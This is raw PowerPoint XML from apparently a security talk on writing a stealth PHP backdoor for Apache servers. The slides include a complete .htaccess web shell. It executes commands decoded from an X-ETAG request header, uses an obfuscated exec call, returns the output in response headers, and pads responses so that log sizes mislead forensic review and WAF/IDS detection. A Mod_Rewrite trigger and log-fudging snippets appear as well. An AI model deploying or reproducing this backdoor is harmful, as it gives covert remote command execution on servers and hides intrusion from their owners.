            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>root@bt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>:~# echo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>AA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>dW5hbWUgLWEK | base64 -d</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>V��R�base64: invalid input</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3976631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Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>Mod_Rewrite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>to redirect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>supposed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>url to the .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>RewriteEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> on</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>RewriteCond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> %{HTTP:X-ETAG} !^$</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>RewriteRule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> .* .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> [L]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>This allows us to make requests to existing files, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>the shell if the X-ETAG header is set.</a:t>
            </a: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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="242684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Limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>forensic evidence</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Varied r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>esponse size indicates that the requests to favicon.ico didn’t serve a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial"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9192"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2551233"/>
            <a:ext cx="9144000" cy="948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1472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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>is the story of how I wrote a PHP stealth backdoor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>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Limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>forensic evidence</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Use output </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>buffering so we can fudge content length in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>logs</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>php_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>output_buffering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>php </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ob_clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>str_repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>("A", 9326); </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ob_flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>   exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(); </a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>?&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-AU" dirty="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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1408943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Bringing it all together</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Files ~ "^\.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>ht</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>"&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>    Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>allow,deny</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>    Allow from all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>&lt;/Files&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>AddType</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>application/x-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>-php .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>php_value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>output_buffering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>RewriteEngine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>on</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>RewriteCond</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> %{HTTP:X-ETAG} !^$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>RewriteRule</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> .* .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> [L]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>SHELL &lt;?php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>ob_clean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>(); $b= "base64"."_decode"; $e = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>str_replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>('y','e','</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>yxyc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>'); $e($b(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>substr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>($_SERVER['HTTP_X_ETAG'],2))." 2&gt;&amp;1", $o); header("X-ETAG: AA".base64_encode(implode("\r\n ", $o))); print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>str_repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>("A", 9326); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>ob_flush</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>(); exit(); ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0AB0CFA9-89F7-401B-8A8C-4C85A1343609}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3911944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Implementing: Accessing the shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33794" name="Content Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Unfortunately the WAF/IDS bypass makes it somewhat unfriendly to use with traditional HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>clients, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>so I wrote a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t> based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial"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9221"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="3140968"/>
            <a:ext cx="9144000"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6443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a:xfrm>
            <a:off x="238125" y="781050"/>
            <a:ext cx="8562975" cy="461665"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>DEMO</a:t>
            </a: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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="http://i30.tinypic.com/v33qt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507005"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336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Parting notes</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
